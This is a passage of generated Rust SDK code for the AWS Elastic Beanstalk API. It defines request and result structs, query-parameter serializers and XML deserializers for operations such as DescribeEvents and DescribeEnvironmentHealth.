try!(end_element(tag_name, stack)); Ok(obj) } } pub type DeploymentTimestamp = String; struct DeploymentTimestampDeserializer; impl DeploymentTimestampDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DeploymentTimestamp, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to describe application versions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeApplicationVersionsMessage { #[doc="<p>Specify an application name to show only application versions for that application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>Specify a maximum number of application versions to paginate in the request.</p>"] pub max_records: Option<MaxRecords>, #[doc="<p>Specify a next token to retrieve the next page in a paginated request.</p>"] pub next_token: Option<Token>, #[doc="<p>Specify a version label to show a specific application version.</p>"] pub version_labels: Option<VersionLabelsList>, } /// Serialize `DescribeApplicationVersionsMessage` contents to a `SignedRequest`. 
struct DescribeApplicationVersionsMessageSerializer; impl DescribeApplicationVersionsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeApplicationVersionsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.max_records { params.put(&format!("{}{}", prefix, "MaxRecords"), &field_value.to_string()); } if let Some(ref field_value) = obj.next_token { params.put(&format!("{}{}", prefix, "NextToken"), &field_value); } if let Some(ref field_value) = obj.version_labels { VersionLabelsListSerializer::serialize( params, &format!("{}{}", prefix, "VersionLabels"), field_value, ); } } } #[doc="<p>Request to describe one or more applications.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeApplicationsMessage { #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to only include those with the specified names.</p>"] pub application_names: Option<ApplicationNamesList>, } /// Serialize `DescribeApplicationsMessage` contents to a `SignedRequest`. struct DescribeApplicationsMessageSerializer; impl DescribeApplicationsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeApplicationsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_names { ApplicationNamesListSerializer::serialize( params, &format!("{}{}", prefix, "ApplicationNames"), field_value, ); } } } #[doc="<p>Result message containig a list of application version descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeConfigurationOptionsMessage { #[doc="<p>The name of the application associated with the configuration template or environment. Only needed if you want to describe the configuration options associated with either the configuration template or environment.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The name of the environment whose configuration options you want to describe.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>If specified, restricts the descriptions to only the specified options.</p>"] pub options: Option<OptionsSpecifierList>, #[doc="<p>The name of the solution stack whose configuration options you want to describe.</p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>The name of the configuration template whose configuration options you want to describe.</p>"] pub template_name: Option<ConfigurationTemplateName>, } /// Serialize `DescribeConfigurationOptionsMessage` contents to a `SignedRequest`. 
struct DescribeConfigurationOptionsMessageSerializer; impl DescribeConfigurationOptionsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeConfigurationOptionsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.options { OptionsSpecifierListSerializer::serialize( params, &format!("{}{}", prefix, "Options"), field_value, ); } if let Some(ref field_value) = obj.solution_stack_name { params.put(&format!("{}{}", prefix, "SolutionStackName"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } } } #[doc="<p>Result message containing all of the configuration settings for a specified solution stack or configuration template.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeConfigurationSettingsMessage { #[doc="<p>The application for the environment or configuration template.</p>"] pub application_name: ApplicationName, #[doc="<p>The name of the environment to describe.</p> <p> Condition: You must specify either this or a TemplateName, but not both. If you specify both, AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The name of the configuration template to describe.</p> <p> Conditional: You must specify either this parameter or an EnvironmentName, but not both. If you specify both, AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. If you do not specify either, AWS Elastic Beanstalk returns a <code>MissingRequiredParameter</code> error. </p>"] pub template_name: Option<ConfigurationTemplateName>, } /// Serialize `DescribeConfigurationSettingsMessage` contents to a `SignedRequest`. struct DescribeConfigurationSettingsMessageSerializer; impl DescribeConfigurationSettingsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeConfigurationSettingsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } } } #[doc="<p>See the example below to learn how to create a request body.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentHealthRequest { #[doc="<p>Specify the response elements to return. To retrieve all attributes, set to <code>All</code>. 
If no attribute names are specified, returns the name of the environment.</p>"] pub attribute_names: Option<EnvironmentHealthAttributes>, #[doc="<p>Specify the environment by ID.</p> <p>You must specify either this or an EnvironmentName, or both.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>Specify the environment by name.</p> <p>You must specify either this or an EnvironmentName, or both.</p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `DescribeEnvironmentHealthRequest` contents to a `SignedRequest`. struct DescribeEnvironmentHealthRequestSerializer; impl DescribeEnvironmentHealthRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentHealthRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.attribute_names { EnvironmentHealthAttributesSerializer::serialize( params, &format!("{}{}", prefix, "AttributeNames"), field_value, ); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } #[doc="<p>Health details for an AWS Elastic Beanstalk environment.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentHealthResult { #[doc="<p>Application request metrics for the environment.</p>"] pub application_metrics: Option<ApplicationMetrics>, #[doc="<p>Descriptions of the data that contributed to the environment's current health status.</p>"] pub causes: Option<Causes>, #[doc="<p>The <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">health color</a> of the environment.</p>"] pub color: Option<String>, #[doc="<p>The environment's name.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">health status</a> of the environment. For example, <code>Ok</code>.</p>"] pub health_status: Option<String>, #[doc="<p>Summary health information for the instances in the environment.</p>"] pub instances_health: Option<InstanceHealthSummary>, #[doc="<p>The date and time that the health information was retrieved.</p>"] pub refreshed_at: Option<RefreshedAt>, #[doc="<p>The environment's operational status. <code>Ready</code>, <code>Launching</code>, <code>Updating</code>, <code>Terminating</code>, or <code>Terminated</code>.</p>"] pub status: Option<EnvironmentHealth>, } struct DescribeEnvironmentHealthResultDeserializer; impl DescribeEnvironmentHealthResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DescribeEnvironmentHealthResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = DescribeEnvironmentHealthResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "ApplicationMetrics" => { obj.application_metrics = Some(try!(ApplicationMetricsDeserializer::deserialize("ApplicationMetrics", stack))); } "Causes" => { obj.causes = Some(try!(CausesDeserializer::deserialize("Causes", stack))); } "Color" => { obj.color = Some(try!(StringDeserializer::deserialize("Color", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "HealthStatus" => { obj.health_status = Some(try!(StringDeserializer::deserialize("HealthStatus", stack))); } "InstancesHealth" => { obj.instances_health = Some(try!(InstanceHealthSummaryDeserializer::deserialize("InstancesHealth", stack))); } "RefreshedAt" => { obj.refreshed_at = Some(try!(RefreshedAtDeserializer::deserialize("RefreshedAt", stack))); } "Status" => { obj.status = Some(try!(EnvironmentHealthDeserializer::deserialize("Status", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to list completed and failed managed actions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentManagedActionHistoryRequest { #[doc="<p>The environment ID of the target environment.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the target environment.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The maximum number of items to return for a single request.</p>"] pub max_items: Option<Integer>, #[doc="<p>The pagination token returned by a previous request.</p>"] pub next_token: Option<String>, } /// Serialize `DescribeEnvironmentManagedActionHistoryRequest` contents to a `SignedRequest`. struct DescribeEnvironmentManagedActionHistoryRequestSerializer; impl DescribeEnvironmentManagedActionHistoryRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentManagedActionHistoryRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.max_items { params.put(&format!("{}{}", prefix, "MaxItems"), &field_value.to_string()); } if let Some(ref field_value) = obj.next_token { params.put(&format!("{}{}", prefix, "NextToken"), &field_value); } } } #[doc="<p>A result message containing a list of completed and failed managed actions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentManagedActionHistoryResult { #[doc="<p>A list of completed and failed managed actions.</p>"] pub managed_action_history_items: Option<ManagedActionHistoryItems>, #[doc="<p>A pagination token that you pass to <a>DescribeEnvironmentManagedActionHistory</a> to get the next page of results.</p>"] pub next_token: Option<String>, } struct DescribeEnvironmentManagedActionHistoryResultDeserializer; impl DescribeEnvironmentManagedActionHistoryResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DescribeEnvironmentManagedActionHistoryResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = DescribeEnvironmentManagedActionHistoryResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. 
})) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ManagedActionHistoryItems" => { obj.managed_action_history_items = Some(try!(ManagedActionHistoryItemsDeserializer::deserialize("ManagedActionHistoryItems", stack))); } "NextToken" => { obj.next_token = Some(try!(StringDeserializer::deserialize("NextToken", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to list an environment's upcoming and in-progress managed actions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentManagedActionsRequest { #[doc="<p>The environment ID of the target environment.</p>"] pub environment_id: Option<String>, #[doc="<p>The name of the target environment.</p>"] pub environment_name: Option<String>, #[doc="<p>To show only actions with a particular status, specify a status.</p>"] pub status: Option<ActionStatus>, } /// Serialize `DescribeEnvironmentManagedActionsRequest` contents to a `SignedRequest`. struct DescribeEnvironmentManagedActionsRequestSerializer; impl DescribeEnvironmentManagedActionsRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentManagedActionsRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.status { params.put(&format!("{}{}", prefix, "Status"), &field_value); } } } #[doc="<p>The result message containing a list of managed actions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentManagedActionsResult { #[doc="<p>A list of upcoming and in-progress managed actions.</p>"] pub managed_actions: Option<ManagedActions>, } struct DescribeEnvironmentManagedActionsResultDeserializer; impl DescribeEnvironmentManagedActionsResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DescribeEnvironmentManagedActionsResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = DescribeEnvironmentManagedActionsResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ManagedActions" => { obj.managed_actions = Some(try!(ManagedActionsDeserializer::deserialize("ManagedActions", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to describe the resources in an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentResourcesMessage { #[doc="<p>The ID of the environment to retrieve AWS resource usage data.</p> <p> Condition: You must specify either this or an EnvironmentName, or both. 
If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to retrieve AWS resource usage data.</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `DescribeEnvironmentResourcesMessage` contents to a `SignedRequest`. struct DescribeEnvironmentResourcesMessageSerializer; impl DescribeEnvironmentResourcesMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentResourcesMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } #[doc="<p>Request to describe one or more environments.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentsMessage { #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those that are associated with this application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those that have the specified IDs.</p>"] pub environment_ids: Option<EnvironmentIdList>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those that have the specified names.</p>"] pub environment_names: Option<EnvironmentNamesList>, #[doc="<p>Indicates whether to include deleted environments:</p> <p> <code>true</code>: Environments that have been deleted after <code>IncludedDeletedBackTo</code> are displayed.</p> <p> <code>false</code>: Do not include deleted environments.</p>"] pub include_deleted: Option<IncludeDeleted>, #[doc="<p> If specified when <code>IncludeDeleted</code> is set to <code>true</code>, then environments deleted after this date are displayed. </p>"] pub included_deleted_back_to: Option<IncludeDeletedBackTo>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those that are associated with this application version.</p>"] pub version_label: Option<VersionLabel>, } /// Serialize `DescribeEnvironmentsMessage` contents to a `SignedRequest`. 
struct DescribeEnvironmentsMessageSerializer; impl DescribeEnvironmentsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.environment_ids { EnvironmentIdListSerializer::serialize( params, &format!("{}{}", prefix, "EnvironmentIds"), field_value, ); } if let Some(ref field_value) = obj.environment_names { EnvironmentNamesListSerializer::serialize( params, &format!("{}{}", prefix, "EnvironmentNames"), field_value, ); } if let Some(ref field_value) = obj.include_deleted { params.put(&format!("{}{}", prefix, "IncludeDeleted"), &field_value.to_string()); } if let Some(ref field_value) = obj.included_deleted_back_to { params.put(&format!("{}{}", prefix, "IncludedDeletedBackTo"), &field_value); } if let Some(ref field_value) = obj.version_label { params.put(&format!("{}{}", prefix, "VersionLabel"), &field_value); } } } #[doc="<p>Request to retrieve a list of events for an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEventsMessage { #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those associated with this application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p> If specified, AWS Elastic Beanstalk restricts the returned descriptions to those that occur up to, but not including, the <code>EndTime</code>. </p>"] pub end_time: Option<TimeFilterEnd>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those associated with this environment.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those associated with this environment.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>Specifies the maximum number of events that can be returned, beginning with the most recent event.</p>"] pub max_records: Option<MaxRecords>, #[doc="<p>Pagination token. If specified, the events return the next batch of results.</p>"] pub next_token: Option<Token>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the described events to include only those associated with this request ID.</p>"] pub request_id: Option<RequestId>, #[doc="<p>If specified, limits the events returned from this call to include only those with the specified severity or higher.</p>"] pub severity: Option<EventSeverity>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those that occur on or after this time.</p>"] pub start_time: Option<TimeFilterStart>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those that are associated with this environment configuration.</p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those associated with this application version.</p>"] pub version_label: Option<VersionLabel>, } /// Serialize `DescribeEventsMessage` contents to a `SignedRequest`. 
struct DescribeEventsMessageSerializer; impl DescribeEventsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEventsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.end_time { params.put(&format!("{}{}", prefix, "EndTime"), &field_value); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.max_records { params.put(&format!("{}{}", prefix, "MaxRecords"), &field_value.to_string()); } if let Some(ref field_value) = obj.next_token { params.put(&format!("{}{}", prefix, "NextToken"), &field_value); } if let Some(ref field_value) = obj.request_id { params.put(&format!("{}{}", prefix, "RequestId"), &field_value); } if let Some(ref field_value) = obj.severity { params.put(&format!("{}{}", prefix, "Severity"), &field_value); } if let Some(ref field_value) = obj.start_time { params.put(&format!("{}{}", prefix, "StartTime"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } if let Some(ref field_value) = obj.version_label { params.put(&format!("{}{}", prefix, "VersionLabel"), &field_value); } } } #[doc="<p>Parameters for a call to <code>DescribeInstancesHealth</code>.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeInstancesHealthRequest { #[doc="<p>Specifies the response elements you wish to receive. To retrieve all attributes, set to <code>All</code>. If no attribute names are specified, returns a list of instances.</p>"] pub attribute_names: Option<InstancesHealthAttributes>, #[doc="<p>Specify the AWS Elastic Beanstalk environment by ID.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>Specify the AWS Elastic Beanstalk environment by name.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>Specify the pagination token returned by a previous call.</p>"] pub next_token: Option<NextToken>, } /// Serialize `DescribeInstancesHealthRequest` contents to a `SignedRequest`. 
struct DescribeInstancesHealthRequestSerializer; impl DescribeInstancesHealthRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeInstancesHealthRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.attribute_names { InstancesHealthAttributesSerializer::serialize( params, &format!("{}{}", prefix, "AttributeNames"), field_value, ); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.next_token { params.put(&format!("{}{}", prefix, "NextToken"), &field_value); } } } #[doc="<p>Detailed health information about the Amazon EC2 instances in an AWS Elastic Beanstalk environment.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeInstancesHealthResult { #[doc="<p>Detailed health information about each instance.</p>"] pub instance_health_list: Option<InstanceHealthList>, #[doc="<p>Pagination token for the next page of results, if available.</p>"] pub next_token: Option<NextToken>, #[doc="<p>The date and time that the health information was retrieved.</p>"] pub refreshed_at: Option<RefreshedAt>, } struct DescribeInstancesHealthResultDeserializer; impl DescribeInstancesHealthResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DescribeInstancesHealthResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = DescribeInstancesHealthResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "InstanceHealthList" => { obj.instance_health_list = Some(try!(InstanceHealthListDeserializer::deserialize("InstanceHealthList", stack))); } "NextToken" => { obj.next_token = Some(try!(NextTokenDeserializer::deserialize("NextToken", stack))); } "RefreshedAt" => { obj.refreshed_at = Some(try!(RefreshedAtDeserializer::deserialize("RefreshedAt", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type Description = String; struct DescriptionDeserializer; impl DescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Description, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type Ec2InstanceId = String; struct Ec2InstanceIdDeserializer; impl Ec2InstanceIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Ec2InstanceId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EndpointURL = String; struct EndpointURLDeserializer; impl EndpointURLDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EndpointURL, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentDescription { #[doc="<p>Indicates if there is an in-progress environment configuration update or application version deployment that you can cancel.</p> <p> <code>true:</code> There is an update in progress. </p> <p> <code>false:</code> There are no updates currently in progress. </p>"] pub abortable_operation_in_progress: Option<AbortableOperationInProgress>, #[doc="<p>The name of the application associated with this environment.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The URL to the CNAME for this environment.</p>"] pub cname: Option<DNSCname>, #[doc="<p>The creation date for this environment.</p>"] pub date_created: Option<CreationDate>, #[doc="<p>The last modified date for this environment.</p>"] pub date_updated: Option<UpdateDate>, #[doc="<p>Describes this environment.</p>"] pub description: Option<Description>, #[doc="<p>For load-balanced, autoscaling environments, the URL to the LoadBalancer. For single-instance environments, the IP address of the instance.</p>"] pub endpoint_url: Option<EndpointURL>, #[doc="<p>The ID of this environment.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>A list of links to other environments in the same group.</p>"] pub environment_links: Option<EnvironmentLinks>, #[doc="<p>The name of this environment.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>Describes the health status of the environment. AWS Elastic Beanstalk indicates the failure levels for a running environment:</p> <ul> <li> <p> <code>Red</code>: Indicates the environment is not responsive. Occurs when three or more consecutive failures occur for an environment.</p> </li> <li> <p> <code>Yellow</code>: Indicates that something is wrong. 
Occurs when two consecutive failures occur for an environment.</p> </li> <li> <p> <code>Green</code>: Indicates the environment is healthy and fully functional.</p> </li> <li> <p> <code>Grey</code>: Default health for a new environment. The environment is not fully launched and health checks have not started or health checks are suspended during an <code>UpdateEnvironment</code> or <code>RestartEnvironement</code> request.</p> </li> </ul> <p> Default: <code>Grey</code> </p>"] pub health: Option<EnvironmentHealth>, #[doc="<p>Returns the health status of the application running in your environment. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">Health Colors and Statuses</a>.</p>"] pub health_status: Option<EnvironmentHealthStatus>, #[doc="<p>The description of the AWS resources used by this environment.</p>"] pub resources: Option<EnvironmentResourcesDescription>, #[doc="<p> The name of the <code>SolutionStack</code> deployed with this environment. </p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>The current operational status of the environment:</p> <ul> <li> <p> <code>Launching</code>: Environment is in the process of initial deployment.</p> </li> <li> <p> <code>Updating</code>: Environment is in the process of updating its configuration settings or application version.</p> </li> <li> <p> <code>Ready</code>: Environment is available to have an action performed on it, such as update or terminate.</p> </li> <li> <p> <code>Terminating</code>: Environment is in the shut-down process.</p> </li> <li> <p> <code>Terminated</code>: Environment is not running.</p> </li> </ul>"] pub status: Option<EnvironmentStatus>, #[doc="<p>The name of the configuration template used to originally launch this environment.</p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>Describes the current tier of this environment.</p>"] pub tier: Option<EnvironmentTier>, #[doc="<p>The application version deployed in this environment.</p>"] pub version_label: Option<VersionLabel>, } struct EnvironmentDescriptionDeserializer; impl EnvironmentDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "AbortableOperationInProgress" => { obj.abortable_operation_in_progress = Some(try!(AbortableOperationInProgressDeserializer::deserialize("AbortableOperationInProgress", stack))); } "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "CNAME" => { obj.cname = Some(try!(DNSCnameDeserializer::deserialize("CNAME", stack))); } "DateCreated" => { obj.date_created = Some(try!(CreationDateDeserializer::deserialize("DateCreated", stack))); } "DateUpdated" => { obj.date_updated = Some(try!(UpdateDateDeserializer::deserialize("DateUpdated", stack))); } "Description" => { obj.description = Some(try!(DescriptionDeserializer::deserialize("Description", stack))); } "EndpointURL" => { obj.endpoint_url = Some(try!(EndpointURLDeserializer::deserialize("EndpointURL", stack))); } "EnvironmentId" => { obj.environment_id = Some(try!(EnvironmentIdDeserializer::deserialize("EnvironmentId", stack))); } "EnvironmentLinks" => { obj.environment_links = Some(try!(EnvironmentLinksDeserializer::deserialize("EnvironmentLinks", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "Health" => { obj.health = Some(try!(EnvironmentHealthDeserializer::deserialize("Health", stack))); } "HealthStatus" => { obj.health_status = Some(try!(EnvironmentHealthStatusDeserializer::deserialize("HealthStatus", stack))); } "Resources" => { obj.resources = Some(try!(EnvironmentResourcesDescriptionDeserializer::deserialize("Resources", stack))); } "SolutionStackName" => { obj.solution_stack_name = Some(try!(SolutionStackNameDeserializer::deserialize("SolutionStackName", stack))); } "Status" => { obj.status = Some(try!(EnvironmentStatusDeserializer::deserialize("Status", stack))); } "TemplateName" => { obj.template_name = Some(try!(ConfigurationTemplateNameDeserializer::deserialize("TemplateName", stack))); } "Tier" => { obj.tier = Some(try!(EnvironmentTierDeserializer::deserialize("Tier", stack))); } "VersionLabel" => { obj.version_label = 